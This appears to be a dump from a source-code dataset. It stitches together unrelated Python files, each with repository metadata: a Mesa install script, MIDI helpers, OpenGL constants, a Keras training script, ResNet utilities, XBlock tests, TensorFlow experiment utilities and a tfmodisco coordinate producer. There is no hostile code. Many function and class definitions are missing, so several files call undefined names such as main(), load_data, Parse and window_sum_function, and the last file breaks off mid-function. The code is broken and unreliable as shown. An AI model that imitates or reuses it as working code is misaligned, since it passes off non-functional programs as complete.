c04a299ef4dc134ab3bfdfd03d7e5fd9d275da7c | 1,944 | py | Python | MSMetaEnhancer/libs/Curator.py | xtrojak/pyMSPannotator | 4d6ec0ee9781294c621271a6c045e0b15102bb9b | [
"MIT"
] | 2 | 2021-06-16T07:42:02.000Z | 2021-06-16T09:26:59.000Z | MSMetaEnhancer/libs/Curator.py | xtrojak/pyMSPannotator | 4d6ec0ee9781294c621271a6c045e0b15102bb9b | [
"MIT"
] | 34 | 2021-06-15T09:52:51.000Z | 2021-11-11T13:47:11.000Z | MSMetaEnhancer/libs/Curator.py | xtrojak/pyMSPannotator | 4d6ec0ee9781294c621271a6c045e0b15102bb9b | [
"MIT"
] | 4 | 2021-06-09T06:42:19.000Z | 2021-07-21T08:37:06.000Z | from matchms import utils
| 29.907692 | 89 | 0.598251 |
c04a2a3eb342ba391c15029d393dfe3507aca08e | 2,498 | py | Python | bin/install_megadrivers.py | antmicro/kvm-aosp-external-mesa3d | 9a3a0c1e30421cd1d66b138ef6a3269ceb6de39f | [
"MIT"
] | null | null | null | bin/install_megadrivers.py | antmicro/kvm-aosp-external-mesa3d | 9a3a0c1e30421cd1d66b138ef6a3269ceb6de39f | [
"MIT"
] | null | null | null | bin/install_megadrivers.py | antmicro/kvm-aosp-external-mesa3d | 9a3a0c1e30421cd1d66b138ef6a3269ceb6de39f | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# encoding=utf-8
# Copyright 2017-2018 Intel Corporation
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
"""Script to install megadriver symlinks for meson."""
from __future__ import print_function
import argparse
import os
import shutil
if __name__ == '__main__':
main()
| 33.756757 | 82 | 0.67534 |
c04af6a3b44f5f5884d745baba056412e928f38e | 478 | py | Python | python_files/helpers.py | nilamo/pytchie | 2e7a7501f23d393bdb66b64466f62d2ef741b778 | [
"MIT"
] | 10 | 2019-01-21T14:59:39.000Z | 2022-01-25T19:45:57.000Z | python_files/helpers.py | nilamo/pytchie | 2e7a7501f23d393bdb66b64466f62d2ef741b778 | [
"MIT"
] | 6 | 2019-09-26T08:09:41.000Z | 2019-10-22T14:54:19.000Z | python_files/helpers.py | nilamo/pytchie | 2e7a7501f23d393bdb66b64466f62d2ef741b778 | [
"MIT"
] | 3 | 2019-09-27T23:05:39.000Z | 2019-10-22T01:11:06.000Z | #!/usr/bin/env python
import os
import sys
def midi_to_freq(num):
    """Takes a MIDI number and returns a frequency in Hz for corresponding note."""
    # A4 is MIDI note 69 at 440 Hz; each semitone scales by 2**(1/12).
    semitones_from_a4 = num - 69
    return 440 * 2 ** (semitones_from_a4 / 12.0)
if __name__ == '__main__':
    # Smoke test: print the frequencies for a few MIDI note numbers.
    print(midi_to_freq(69))
    print(midi_to_freq(60))
    print(midi_to_freq(105))
| 23.9 | 85 | 0.656904 |
c04af8ddce186b3fd697e8b4010edd2847a07c3a | 2,896 | py | Python | test/integrationMyndFskr.py | redhog/ferenda | 6935e26fdc63adc68b8e852292456b8d9155b1f7 | [
"BSD-2-Clause"
] | 18 | 2015-03-12T17:42:44.000Z | 2021-12-27T10:32:22.000Z | test/integrationMyndFskr.py | redhog/ferenda | 6935e26fdc63adc68b8e852292456b8d9155b1f7 | [
"BSD-2-Clause"
] | 13 | 2016-01-27T10:19:07.000Z | 2021-12-13T20:24:36.000Z | test/integrationMyndFskr.py | redhog/ferenda | 6935e26fdc63adc68b8e852292456b8d9155b1f7 | [
"BSD-2-Clause"
] | 6 | 2016-11-28T15:41:29.000Z | 2022-01-08T11:16:48.000Z | # -*- coding: utf-8 -*-
from __future__ import (absolute_import, division,
print_function, unicode_literals)
from builtins import *
import os
import sys
import shutil
import inspect
from ferenda import TextReader, util
from ferenda.testutil import RepoTester, file_parametrize
from ferenda.compat import unittest
# SUT
from ferenda.sources.legal.se import myndfskr
file_parametrize(Parse, "test/files/myndfskr", ".txt")
| 39.135135 | 82 | 0.631906 |
c04b151e636326dee485fc70fa9e09aa52af0717 | 2,319 | py | Python | OpenGLWrapper_JE/venv/Lib/site-packages/OpenGL/raw/GL/NV/geometry_program4.py | JE-Chen/je_old_repo | a8b2f1ac2eec25758bd15b71c64b59b27e0bcda5 | [
"MIT"
] | null | null | null | OpenGLWrapper_JE/venv/Lib/site-packages/OpenGL/raw/GL/NV/geometry_program4.py | JE-Chen/je_old_repo | a8b2f1ac2eec25758bd15b71c64b59b27e0bcda5 | [
"MIT"
] | null | null | null | OpenGLWrapper_JE/venv/Lib/site-packages/OpenGL/raw/GL/NV/geometry_program4.py | JE-Chen/je_old_repo | a8b2f1ac2eec25758bd15b71c64b59b27e0bcda5 | [
"MIT"
] | null | null | null | '''Autogenerated by xml_generate script, do not edit!'''
from OpenGL import platform as _p, arrays
# Code generation uses this
from OpenGL.raw.GL import _types as _cs
# End users want this...
from OpenGL.raw.GL._types import *
from OpenGL.raw.GL import _errors
from OpenGL.constant import Constant as _C
import ctypes
_EXTENSION_NAME = 'GL_NV_geometry_program4'
GL_FRAMEBUFFER_ATTACHMENT_LAYERED_EXT=_C('GL_FRAMEBUFFER_ATTACHMENT_LAYERED_EXT',0x8DA7)
GL_FRAMEBUFFER_ATTACHMENT_TEXTURE_LAYER_EXT=_C('GL_FRAMEBUFFER_ATTACHMENT_TEXTURE_LAYER_EXT',0x8CD4)
GL_FRAMEBUFFER_INCOMPLETE_LAYER_COUNT_EXT=_C('GL_FRAMEBUFFER_INCOMPLETE_LAYER_COUNT_EXT',0x8DA9)
GL_FRAMEBUFFER_INCOMPLETE_LAYER_TARGETS_EXT=_C('GL_FRAMEBUFFER_INCOMPLETE_LAYER_TARGETS_EXT',0x8DA8)
GL_GEOMETRY_INPUT_TYPE_EXT=_C('GL_GEOMETRY_INPUT_TYPE_EXT',0x8DDB)
GL_GEOMETRY_OUTPUT_TYPE_EXT=_C('GL_GEOMETRY_OUTPUT_TYPE_EXT',0x8DDC)
GL_GEOMETRY_PROGRAM_NV=_C('GL_GEOMETRY_PROGRAM_NV',0x8C26)
GL_GEOMETRY_VERTICES_OUT_EXT=_C('GL_GEOMETRY_VERTICES_OUT_EXT',0x8DDA)
GL_LINES_ADJACENCY_EXT=_C('GL_LINES_ADJACENCY_EXT',0x000A)
GL_LINE_STRIP_ADJACENCY_EXT=_C('GL_LINE_STRIP_ADJACENCY_EXT',0x000B)
GL_MAX_GEOMETRY_TEXTURE_IMAGE_UNITS_EXT=_C('GL_MAX_GEOMETRY_TEXTURE_IMAGE_UNITS_EXT',0x8C29)
GL_MAX_PROGRAM_OUTPUT_VERTICES_NV=_C('GL_MAX_PROGRAM_OUTPUT_VERTICES_NV',0x8C27)
GL_MAX_PROGRAM_TOTAL_OUTPUT_COMPONENTS_NV=_C('GL_MAX_PROGRAM_TOTAL_OUTPUT_COMPONENTS_NV',0x8C28)
GL_PROGRAM_POINT_SIZE_EXT=_C('GL_PROGRAM_POINT_SIZE_EXT',0x8642)
GL_TRIANGLES_ADJACENCY_EXT=_C('GL_TRIANGLES_ADJACENCY_EXT',0x000C)
GL_TRIANGLE_STRIP_ADJACENCY_EXT=_C('GL_TRIANGLE_STRIP_ADJACENCY_EXT',0x000D)
| 55.214286 | 118 | 0.850367 |
c04b8e57191159c1e20db662b36e4eb42827c687 | 2,652 | py | Python | benchbuild/projects/benchbuild/xz.py | sturmianseq/benchbuild | e3cc1a24e877261e90baf781aa67a9d6f6528dac | [
"MIT"
] | 11 | 2017-10-05T08:59:35.000Z | 2021-05-29T01:43:07.000Z | benchbuild/projects/benchbuild/xz.py | sturmianseq/benchbuild | e3cc1a24e877261e90baf781aa67a9d6f6528dac | [
"MIT"
] | 326 | 2016-07-12T08:11:43.000Z | 2022-03-28T07:10:11.000Z | benchbuild/projects/benchbuild/xz.py | sturmianseq/benchbuild | e3cc1a24e877261e90baf781aa67a9d6f6528dac | [
"MIT"
] | 13 | 2016-06-17T12:13:35.000Z | 2022-01-04T16:09:12.000Z | from plumbum import local
import benchbuild as bb
from benchbuild.environments.domain.declarative import ContainerImage
from benchbuild.source import HTTP
from benchbuild.utils.cmd import make, tar
| 36.833333 | 77 | 0.536199 |
c04bfbdd189377e61884680d0c03817aca6a78ee | 1,101 | py | Python | train.py | sazzad/CarND-Behavioral-Cloning-P3 | 46599661bf194cf22683f49cae749eb403aaff01 | [
"MIT"
] | null | null | null | train.py | sazzad/CarND-Behavioral-Cloning-P3 | 46599661bf194cf22683f49cae749eb403aaff01 | [
"MIT"
] | null | null | null | train.py | sazzad/CarND-Behavioral-Cloning-P3 | 46599661bf194cf22683f49cae749eb403aaff01 | [
"MIT"
] | null | null | null | import numpy as np
import csv
import cv2
from keras.models import Sequential
from keras.layers import Dense, Flatten
if __name__ == "__main__":
X_train, y_train = load_data()
train(X_train, y_train) | 28.973684 | 80 | 0.647593 |
c04ce8c06bdc166d9b3b9ffe4880ea147a89ea15 | 3,226 | py | Python | models/FedXXX/resnet_utils.py | TD21forever/QoS-Predcition-Algorithm-library | f4503462887d719a39c9ccddd6cc55546e783fd5 | [
"MIT"
] | 2 | 2022-02-08T08:19:59.000Z | 2022-02-17T01:42:54.000Z | models/FedXXX/resnet_utils.py | TD21forever/QoS-Predcition-Algorithm-library | f4503462887d719a39c9ccddd6cc55546e783fd5 | [
"MIT"
] | null | null | null | models/FedXXX/resnet_utils.py | TD21forever/QoS-Predcition-Algorithm-library | f4503462887d719a39c9ccddd6cc55546e783fd5 | [
"MIT"
] | null | null | null | from abc import get_cache_token
from collections import OrderedDict
from torch import nn
# short cut
# block
# resnetblock
# resnet layerencoder
if __name__ == "__main__":
m = ResNetEncoder()
print(get_parameter_number(m))
| 28.548673 | 91 | 0.614073 |
c04d90069f191974d0ed369a9c73406bd54fa0cc | 2,114 | py | Python | xblock/test/test_json_conversion.py | edly-io/XBlock | 60d01a32e5bfe1b543f598cbc56ba3f4d736129d | [
"Apache-2.0"
] | null | null | null | xblock/test/test_json_conversion.py | edly-io/XBlock | 60d01a32e5bfe1b543f598cbc56ba3f4d736129d | [
"Apache-2.0"
] | null | null | null | xblock/test/test_json_conversion.py | edly-io/XBlock | 60d01a32e5bfe1b543f598cbc56ba3f4d736129d | [
"Apache-2.0"
] | null | null | null | """
Tests asserting that ModelTypes convert to and from json when working
with ModelDatas
"""
# Allow inspection of private class members
# pylint: disable=protected-access
from mock import Mock
from xblock.core import XBlock
from xblock.fields import Field, Scope, ScopeIds
from xblock.field_data import DictFieldData
from xblock.test.tools import TestRuntime
| 28.186667 | 120 | 0.64333 |
c04dc0e5e93dcddb8cf11931aefe2f5bf4588f05 | 10,592 | py | Python | uq_benchmark_2019/experiment_utils.py | pedersor/google-research | 6fa751dd261b3f6d918fd2cd35efef5d8bf3eea6 | [
"Apache-2.0"
] | null | null | null | uq_benchmark_2019/experiment_utils.py | pedersor/google-research | 6fa751dd261b3f6d918fd2cd35efef5d8bf3eea6 | [
"Apache-2.0"
] | null | null | null | uq_benchmark_2019/experiment_utils.py | pedersor/google-research | 6fa751dd261b3f6d918fd2cd35efef5d8bf3eea6 | [
"Apache-2.0"
] | null | null | null | # coding=utf-8
# Copyright 2022 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utilities to help set up and run experiments."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import json
import os.path
from absl import logging
import numpy as np
import scipy.special
from six.moves import range
from six.moves import zip
import tensorflow.compat.v2 as tf
import tensorflow_datasets as tfds
gfile = tf.io.gfile
def save_model(model, output_dir):
  """Save Keras model weights and architecture as HDF5 file.

  Args:
    model: Trained Keras model to serialize.
    output_dir: Directory the `model.hdf5` file is written to.

  Returns:
    Path of the written HDF5 file.
  """
  save_path = '%s/model.hdf5' % output_dir
  logging.info('Saving model to %s', save_path)
  # Optimizer state is intentionally dropped; only weights/architecture persist.
  model.save(save_path, include_optimizer=False)
  return save_path
def metrics_from_stats(stats):
  """Compute metrics to report to hyperparameter tuner.

  Args:
    stats: dict with 'labels' (shape [N] int array) and 'probs'
      (shape [N] for binary, or [N, K]) entries.

  Returns:
    dict with scalar 'accuracy', 'brier_score' and 'log_prob' entries.
  """
  labels = stats['labels']
  probs = stats['probs']
  # Reshape binary predictions to 2-class.
  if probs.ndim == 1:
    probs = np.stack([1 - probs, probs], axis=-1)
  assert probs.ndim == 2

  preds = probs.argmax(axis=-1)
  correct = np.equal(labels, preds)
  # Probability assigned to the true label of each example.
  true_label_probs = probs[np.arange(len(labels)), labels]
  # Clip log-probs from below to keep zero-probability labels finite.
  clipped_log_probs = np.maximum(-1e10, np.log(true_label_probs))
  brier = np.square(probs).sum(-1) - 2 * true_label_probs

  return {'accuracy': correct.mean(0),
          'brier_score': brier.mean(0),
          'log_prob': clipped_log_probs.mean(0)}
def make_predictions(
    model, batched_dataset, predictions_per_example=1, writers=None,
    predictions_are_logits=True, record_image_samples=True, max_batches=1e6):
  """Build a dictionary of predictions for examples from a dataset.

  Args:
    model: Trained Keras model.
    batched_dataset: tf.data.Dataset that yields batches of image, label pairs.
    predictions_per_example: Number of predictions to generate per example.
    writers: `dict` with keys 'small' and 'full', containing
      array_utils.StatsWriter instances for full prediction results and small
      prediction results (omitting logits).
    predictions_are_logits: Indicates whether model outputs are logits or
      probabilities.
    record_image_samples: `bool` Record one batch of input examples.
    max_batches: `int`, maximum number of batches.

  Returns:
    Dictionary containing:
      labels: Labels copied from the dataset (shape=[N]).
      logits_samples: Samples of model predict outputs for each example
        (shape=[N, M, K]).
      probs: Probabilities after averaging over samples (shape=[N, K]).
      image_samples: One batch of input images (for sanity checking).
  """
  # Sample averaging happens in probability space, so logits are softmaxed
  # before the mean over the samples axis.
  if predictions_are_logits:
    samples_key = 'logits_samples'
    avg_probs_fn = lambda x: scipy.special.softmax(x, axis=-1).mean(-2)
  else:
    samples_key = 'probs_samples'
    avg_probs_fn = lambda x: x.mean(-2)

  labels, outputs = [], []
  # Accept either a Keras model (use .predict) or a bare callable.
  predict_fn = model.predict if hasattr(model, 'predict') else model
  for i, (inputs_i, labels_i) in enumerate(tfds.as_numpy(batched_dataset)):
    logging.info('iteration: %d', i)
    # Draw predictions_per_example samples per input; shape [batch, M, K].
    outputs_i = np.stack(
        [predict_fn(inputs_i) for _ in range(predictions_per_example)], axis=1)
    if writers is None:
      # In-memory mode: accumulate everything and return it at the end.
      labels.extend(labels_i)
      outputs.append(outputs_i)
    else:
      # Streaming mode: write each batch out; 'small' omits the raw samples.
      avg_probs_i = avg_probs_fn(outputs_i)
      prediction_batch = dict(labels=labels_i, probs=avg_probs_i)
      if i == 0 and record_image_samples:
        prediction_batch['image_samples'] = inputs_i
      writers['small'].write_batch(prediction_batch)
      prediction_batch[samples_key] = outputs_i
      writers['full'].write_batch(prediction_batch)

    # Don't predict whole ImageNet training set
    if i > max_batches:
      break

  if writers is None:
    image_samples = inputs_i  # pylint: disable=undefined-loop-variable
    labels = np.stack(labels, axis=0)
    outputs = np.concatenate(outputs, axis=0)
    stats = {'labels': labels, 'image_samples': image_samples,
             samples_key: outputs, 'probs': avg_probs_fn(outputs)}
    if record_image_samples:
      stats['image_samples'] = image_samples
    return stats
def get_distribution_strategy(distribution_strategy='default',
                              num_gpus=0,
                              num_workers=1,
                              all_reduce_alg=None,
                              num_packs=1):
  """Return a DistributionStrategy for running the model.

  Args:
    distribution_strategy: a string specifying which distribution strategy to
      use. Accepted values are 'off', 'default', 'one_device', 'mirrored',
      'parameter_server', 'multi_worker_mirrored', case insensitive. 'off' means
      not to use Distribution Strategy; 'default' means to choose from
      `MirroredStrategy`, `MultiWorkerMirroredStrategy`, or `OneDeviceStrategy`
      according to the number of GPUs and number of workers.
    num_gpus: Number of GPUs to run this model.
    num_workers: Number of workers to run this model.
    all_reduce_alg: Optional. Specifies which algorithm to use when performing
      all-reduce. For `MirroredStrategy`, valid values are 'nccl' and
      'hierarchical_copy'. For `MultiWorkerMirroredStrategy`, valid values are
      'ring' and 'nccl'. If None, DistributionStrategy will choose based on
      device topology.
    num_packs: Optional. Sets the `num_packs` in `tf.distribute.NcclAllReduce`
      or `tf.distribute.HierarchicalCopyAllReduce` for `MirroredStrategy`.

  Returns:
    tf.distribute.DistibutionStrategy object.

  Raises:
    ValueError: if `distribution_strategy` is 'off' or 'one_device' and
      `num_gpus` is larger than 1; or `num_gpus` is negative.
  """
  if num_gpus < 0:
    raise ValueError('`num_gpus` can not be negative.')

  # Normalize so the string comparisons below are case-insensitive.
  distribution_strategy = distribution_strategy.lower()

  if distribution_strategy == 'off':
    if num_gpus > 1:
      raise ValueError(
          'When {} GPUs and {} workers are specified, distribution_strategy '
          'flag cannot be set to "off".'.format(num_gpus, num_workers))
    return None

  if distribution_strategy == 'multi_worker_mirrored':
    return tf.distribute.experimental.MultiWorkerMirroredStrategy(
        communication=_collective_communication(all_reduce_alg))

  # 'default' with at most one GPU degrades to a single-device strategy.
  if (distribution_strategy == 'one_device' or
      (distribution_strategy == 'default' and num_gpus <= 1)):
    if num_gpus == 0:
      return tf.distribute.OneDeviceStrategy('device:CPU:0')
    else:
      if num_gpus > 1:
        raise ValueError('`OneDeviceStrategy` can not be used for more than '
                         'one device.')
      return tf.distribute.OneDeviceStrategy('device:GPU:0')

  if distribution_strategy in ('mirrored', 'default'):
    if num_gpus == 0:
      # Explicit 'mirrored' with zero GPUs mirrors across the CPU only.
      assert distribution_strategy == 'mirrored'
      devices = ['device:CPU:0']
    else:
      devices = ['device:GPU:%d' % i for i in range(num_gpus)]
    return tf.distribute.MirroredStrategy(
        devices=devices,
        cross_device_ops=_mirrored_cross_device_ops(all_reduce_alg, num_packs))

  if distribution_strategy == 'parameter_server':
    return tf.compat.v1.distribute.experimental.ParameterServerStrategy()

  raise ValueError(
      'Unrecognized Distribution Strategy: %r' % distribution_strategy)
def _collective_communication(all_reduce_alg):
  """Translate an all-reduce algorithm name into a CollectiveCommunication.

  Args:
    all_reduce_alg: None (let TensorFlow decide), 'ring' or 'nccl'.

  Returns:
    The matching tf.distribute.experimental.CollectiveCommunication member.

  Raises:
    ValueError: if `all_reduce_alg` is not one of None, 'ring' or 'nccl'.
  """
  communication = tf.distribute.experimental.CollectiveCommunication
  options = {
      None: communication.AUTO,
      'ring': communication.RING,
      'nccl': communication.NCCL,
  }
  if all_reduce_alg not in options:
    raise ValueError(
        'When used with `multi_worker_mirrored`, valid values for '
        'all_reduce_alg are ["ring", "nccl"]. Supplied value: {}'.format(
            all_reduce_alg))
  return options[all_reduce_alg]
def _mirrored_cross_device_ops(all_reduce_alg, num_packs):
  """Build the CrossDeviceOps for MirroredStrategy, if one was requested.

  Args:
    all_reduce_alg: 'nccl', 'hierarchical_copy', or None for the default.
    num_packs: number of gradient packs handed to the cross-device op.

  Returns:
    A configured tf.distribute.CrossDeviceOps instance, or None when
    `all_reduce_alg` is None (caller falls back to the framework default).

  Raises:
    ValueError: if `all_reduce_alg` is not None, 'nccl' or
      'hierarchical_copy'.
  """
  if all_reduce_alg is None:
    return None
  ops_by_name = {
      'nccl': tf.distribute.NcclAllReduce,
      'hierarchical_copy': tf.distribute.HierarchicalCopyAllReduce,
  }
  if all_reduce_alg not in ops_by_name:
    raise ValueError(
        'When used with `mirrored`, valid values for all_reduce_alg are '
        '["nccl", "hierarchical_copy"]. Supplied value: {}'.format(
            all_reduce_alg))
  return ops_by_name[all_reduce_alg](num_packs=num_packs)
| 36.273973 | 80 | 0.715823 |
c04f13b9a712c28cf890f8bd241f887d6602c688 | 42,844 | py | Python | modisco/coordproducers.py | Bluedragon137/tfmodisco | d7c56b21e1bb58b07695ef3035f173b7d1a039e6 | [
"MIT"
] | null | null | null | modisco/coordproducers.py | Bluedragon137/tfmodisco | d7c56b21e1bb58b07695ef3035f173b7d1a039e6 | [
"MIT"
] | null | null | null | modisco/coordproducers.py | Bluedragon137/tfmodisco | d7c56b21e1bb58b07695ef3035f173b7d1a039e6 | [
"MIT"
] | null | null | null | from __future__ import division, print_function, absolute_import
from .core import SeqletCoordinates
from modisco import util
import numpy as np
from collections import defaultdict, Counter, OrderedDict
import itertools
import sys
import time
from .value_provider import (
AbstractValTransformer, AbsPercentileValTransformer,
SignedPercentileValTransformer, PrecisionValTransformer)
import scipy
from sklearn.isotonic import IsotonicRegression
SUBSAMPLE_CAP = 1000000
#The only parts of TransformAndThresholdResults that are used in
# TfModiscoWorkflow are the transformed_pos/neg_thresholds and the
# val_transformer (used in metaclustering with multiple tasks)
#TransformAndThresholdResults are also used to be
# able to replicate the same procedure used for identifying coordinates as
# when TfMoDisco was first run; the information needed in that case would
# be specific to the type of Coordproducer used
#FWAC = FixedWindowAroundChunks; this TransformAndThresholdResults object
# is specific to the type of info needed in that case.
def get_simple_window_sum_function(window_size):
    # Factory: returns a function that computes sliding-window sums of width
    # `window_size` over each array in a list of score arrays.
    # NOTE(review): `window_sum_function` is not defined in this excerpt —
    # presumably a nested `def window_sum_function(arrs): ...` closing over
    # `window_size` was stripped; confirm against the full file.
    return window_sum_function
def get_null_vals(null_track, score_track, window_size,
                  original_summed_score_track):
    """Produce the null-distribution values used for thresholding.

    If `null_track` is callable it is treated as a custom null-value
    generator and invoked with the keyword arguments below; otherwise it is
    taken to be a list of per-example score arrays, which are summed over
    sliding windows of `window_size` and flattened into one list.
    """
    if hasattr(null_track, '__call__'):
        # Custom generator: delegate entirely to the supplied callable.
        return null_track(
            score_track=score_track,
            window_size=window_size,
            original_summed_score_track=original_summed_score_track)
    # Plain track: window-sum each example, then flatten across examples.
    summed_tracks = get_simple_window_sum_function(window_size)(
        arrs=null_track)
    return list(np.concatenate(summed_tracks, axis=0))
def subsample_if_large(arr):
    """Cap `arr` at SUBSAMPLE_CAP entries via a fixed-seed random subsample.

    Arrays at or below the cap are returned unchanged.  Larger arrays are
    subsampled without replacement using a fixed seed so repeated runs pick
    the same subset.
    """
    if len(arr) <= SUBSAMPLE_CAP:
        return arr
    print("Subsampling!")
    sys.stdout.flush()
    rng = np.random.RandomState(1234)
    return rng.choice(a=arr, size=SUBSAMPLE_CAP, replace=False)
def irval_to_probpos(irval, frac_neg):
    """Convert an isotonic-regression output into an estimated P(positive).

    With n(x)/p(x) the null/positive densities and f_n the fraction of
    negatives, isotonic regression of observed-vs-null labels yields
    a(x) = o(x)/[o(x)+n(x)].  Solving for the posterior probability of being
    a positive gives p_pos = 1 + f_n*(1 - 1/a(x)), which is then clipped to
    [0, 1].  `irval` is floored at 1e-7 to avoid division by zero.
    Works elementwise on arrays as well as on scalars.
    """
    posterior = 1 + frac_neg * (1 - 1 / np.maximum(irval, 1e-7))
    return np.clip(posterior, 0.0, 1.0)
#sliding in this case would be a list of values
#identify_coords is expecting something that has already been processed
# with sliding windows of size window_size
def identify_coords(score_track, pos_threshold, neg_threshold,
                    window_size, flank, suppress,
                    max_seqlets_total, verbose, other_info_tracks={}):
    """Greedily pick seqlet coordinates at high-|score| window positions.

    score_track: list of per-example 1-d arrays of window-summed scores.
    pos_threshold/neg_threshold: a position is a candidate iff its score is
        >= pos_threshold or <= neg_threshold.
    window_size/flank: each coordinate spans [argmax-flank,
        argmax+window_size+flank) within its example.
    suppress: after each pick, positions within +-suppress of it are
        excluded from further picks.
    max_seqlets_total: if not None, keep only the top-|score| coordinates.
    other_info_tracks: dict of name -> track (same shapes as score_track);
        the per-position value is attached to each picked coordinate.
        NOTE(review): the mutable default {} is only read, never mutated,
        so it is safe here, though a None default would be conventional.
    Returns a list of SeqletCoordsFWAP objects (class defined elsewhere in
    this module).
    """
    for other_info_track in other_info_tracks.values():
        assert all([x.shape==y.shape for x,y
                    in zip(other_info_track,score_track)])
    #cp_score_track = 'copy' of the score track, which can be modified as
    # coordinates are identified
    cp_score_track = [np.array(x) for x in score_track]
    #if a position is less than the threshold, set it to -np.inf
    #Note that the threshold comparisons need to be >= and not just > for
    # cases where there are lots of ties at the high end (e.g. with an IR
    # transformation that gives a lot of values that have a precision of 1.0)
    # Passing positions keep their absolute value so argmax treats strong
    # negative scores the same as strong positive ones.
    cp_score_track = [
        np.array([np.abs(y) if (y >= pos_threshold
                                or y <= neg_threshold)
                  else -np.inf for y in x])
        for x in cp_score_track]
    coords = []
    for example_idx,single_score_track in enumerate(cp_score_track):
        #set the stuff near the flanks to -np.inf so that we
        # don't pick it up during argmax
        single_score_track[0:flank] = -np.inf
        single_score_track[len(single_score_track)-(flank):
                           len(single_score_track)] = -np.inf
        while True:
            argmax = np.argmax(single_score_track,axis=0)
            max_val = single_score_track[argmax]
            #bail if exhausted everything that passed the threshold
            #and was not suppressed
            if (max_val == -np.inf):
                break
            #need to be able to expand without going off the edge
            if ((argmax >= flank) and
                (argmax < (len(single_score_track)-flank))):
                # Score attached to the coord is the ORIGINAL (signed)
                # score, not the absolute value used for ranking.
                coord = SeqletCoordsFWAP(
                    example_idx=example_idx,
                    start=argmax-flank,
                    end=argmax+window_size+flank,
                    score=score_track[example_idx][argmax],
                    other_info = dict([
                        (track_name, track[example_idx][argmax])
                        for (track_name, track) in other_info_tracks.items()]))
                assert (coord.score >= pos_threshold
                        or coord.score <= neg_threshold)
                coords.append(coord)
            else:
                assert False,\
                    ("This shouldn't happen because I set stuff near the"
                     "border to -np.inf early on")
            #suppress the chunks within +- suppress
            left_supp_idx = int(max(np.floor(argmax+0.5-suppress),0))
            right_supp_idx = int(min(np.ceil(argmax+0.5+suppress),
                                     len(single_score_track)))
            single_score_track[left_supp_idx:right_supp_idx] = -np.inf
    if (verbose):
        print("Got "+str(len(coords))+" coords")
        sys.stdout.flush()
    # Optionally trim to the strongest coordinates by absolute score.
    if ((max_seqlets_total is not None) and
        len(coords) > max_seqlets_total):
        if (verbose):
            print("Limiting to top "+str(max_seqlets_total))
            sys.stdout.flush()
        coords = sorted(coords, key=lambda x: -np.abs(x.score))\
                        [:max_seqlets_total]
    return coords
def refine_thresholds_based_on_frac_passing(
        vals, pos_threshold, neg_threshold,
        min_passing_windows_frac, max_passing_windows_frac,
        separate_pos_neg_thresholds, verbose):
    """Clamp thresholds so the fraction of passing windows stays in range.

    Args:
        vals: 1-d numpy array of window scores (positive and negative).
        pos_threshold, neg_threshold: initial thresholds (e.g. derived from
            a null distribution); a window passes if its value is
            >= pos_threshold or <= neg_threshold.
        min_passing_windows_frac, max_passing_windows_frac: allowed range
            for the fraction of windows that pass.
        separate_pos_neg_thresholds: if True, recompute the positive and
            negative thresholds from the positive/negative values
            separately; otherwise use a symmetric threshold on |vals|.
        verbose: if True, print diagnostics.

    Returns:
        (pos_threshold, neg_threshold), possibly adjusted so that the
        passing fraction lands inside the requested range.
    """
    def thresholds_for_frac(target_frac):
        # Recompute thresholds so that approximately `target_frac` of the
        # windows pass (shared by the below-min and above-max branches,
        # which previously duplicated this logic).
        if separate_pos_neg_thresholds:
            new_pos = np.percentile(a=pos_vals, q=100 * (1 - target_frac))
            new_neg = np.percentile(a=neg_vals, q=100 * target_frac)
        else:
            new_pos = np.percentile(a=np.abs(vals),
                                    q=100 * (1 - target_frac))
            new_neg = -new_pos
        return new_pos, new_neg

    frac_passing_windows = (
        sum(vals >= pos_threshold)
        + sum(vals <= neg_threshold)) / float(len(vals))
    if verbose:
        print("Thresholds from null dist were",
              neg_threshold, " and ", pos_threshold,
              "with frac passing", frac_passing_windows)
    pos_vals = [x for x in vals if x >= 0]
    neg_vals = [x for x in vals if x < 0]
    # Deal with the edge case of an empty side (np.percentile would fail
    # on an empty list).
    pos_vals = [0] if len(pos_vals) == 0 else pos_vals
    neg_vals = [0] if len(neg_vals) == 0 else neg_vals
    # Adjust the thresholds if the passing fraction falls outside
    # [min_passing_windows_frac, max_passing_windows_frac].
    if frac_passing_windows < min_passing_windows_frac:
        if verbose:
            print("Passing windows frac was",
                  frac_passing_windows, ", which is below ",
                  min_passing_windows_frac, "; adjusting")
        pos_threshold, neg_threshold = thresholds_for_frac(
            min_passing_windows_frac)
    if frac_passing_windows > max_passing_windows_frac:
        if verbose:
            print("Passing windows frac was",
                  frac_passing_windows, ", which is above ",
                  max_passing_windows_frac, "; adjusting")
        pos_threshold, neg_threshold = thresholds_for_frac(
            max_passing_windows_frac)
    if verbose:
        print("New thresholds are", pos_threshold, "and", neg_threshold)
    return pos_threshold, neg_threshold
def make_nulldist_figure(orig_vals, null_vals, pos_ir, neg_ir,
pos_threshold, neg_threshold):
from matplotlib import pyplot as plt
fig,ax1 = plt.subplots()
orig_vals = np.array(sorted(orig_vals))
ax1.hist(orig_vals, bins=100, density=True, alpha=0.5)
ax1.hist(null_vals, bins=100, density=True, alpha=0.5)
